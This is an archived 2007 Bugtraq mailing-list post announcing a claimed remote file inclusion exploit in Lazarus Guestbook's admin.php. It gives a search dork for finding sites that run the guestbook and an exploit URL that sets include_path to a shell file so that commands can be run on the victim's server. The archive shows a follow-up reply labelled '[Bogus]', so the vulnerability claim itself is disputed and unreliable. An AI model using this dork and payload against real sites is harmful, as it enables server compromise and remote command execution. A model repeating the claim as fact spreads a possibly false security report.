Lazarus Guestbook (admin.php)Remote File Include Expliot

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Lazarus Guestbook (admin.php)Remote File Include Expliot
From: c_r_ck@xxxxxxxxxxx
Date: 7 Mar 2007 23:23:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# Lazarus Guestbook (admin.php)Remote File Include Expliot
# D.Script: http://www.carbonize.co.uk
# Dork: "Powered by Lazarus Guestbook from carbonize.co.uk"
# Discovered by Crack_man
# Homepage: http://www.b0rizq.biz
# Greetz To :B0rizq & red_casper & Draknaz kaiba & broken_proxy and all freind

# Exploit:
# [VicTim]/[path]/admin.php?include_path=shell.txt?cmd  

===========================

Follow-Ups:
- Re: [Bogus] Lazarus Guestbook (admin.php)Remote File Include Expliot -
  - From: Mailinglists Address

Prev by Date: FLSA - foresight linux security announcements
Next by Date: Buffer-overflow in Conquest client 8.2a (svn 691)
Previous by thread: FLEA-2007-0015-1: gimp
Next by thread: Re: [Bogus] Lazarus Guestbook (admin.php)Remote File Include Expliot -
Index(es):
- Date
- Thread